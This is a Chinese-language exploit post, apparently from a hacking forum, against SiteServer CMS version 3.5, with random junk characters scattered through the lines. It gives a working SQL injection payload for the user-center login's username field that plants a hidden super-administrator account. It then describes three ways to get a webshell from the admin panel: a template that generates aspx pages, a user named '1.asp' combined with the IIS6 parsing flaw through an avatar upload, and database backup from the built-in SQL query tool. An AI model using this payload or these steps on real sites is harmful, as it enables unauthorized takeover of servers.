经测试秒杀最新的3.5版
9 ?% X" `6 a8 a3 estieserver官网:www.siteserver.cn
- d2 L2 Q9 F3 u+ P' H. ]% REXP:! H, D% h0 W% B' Y0 l. W+ m
直接访问UserCenter/login.aspx
$ s) T+ x; U" r2 @) P& {用户名处输入:
, M" D/ Q& h) k
. D, T+ H# ^3 s( K3 j0 I' W* I- f123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–2 U4 \- \+ ]% U' l2 B
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。8 I! g, [1 K! {) z% z8 ]
之后再访问后台SiteServer/login.aspx用插入的用户登陆8 A3 [( `8 h1 p: m6 J" |) d
后台拿webshell的三种方法:
& ~. A8 d1 M8 x, M一、( @2 U4 d F& w# o, D
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx" I' C6 c1 u. ]/ \8 W. f
二、 Z0 i7 g: z+ R* I5 [
成员权限-》添加用户-》用户名为:1.asp+ j% |* V+ Q3 e2 w
http://127.0.0.1/usercenter/7 Y$ ~1 |5 Q) R' ^& M+ V/ v
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell% b! ?- g3 T2 ^$ X1 [
(ps:后台添加用户时不会验证是否含有非法字符)
4 m; Y7 c% _9 J# h' ?) t三、
" K* {9 w$ b! v" V8 [系统工具-》实用工具-》机器参数查看9 C) E3 ~6 S& S1 c
可以看到数据库类型、名称,WEB路径; V% U; u6 G1 Q `8 A6 S# ~
系统工具-》数据库工具-》SQL语句查询( X- v, v8 U7 e: _. ?
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |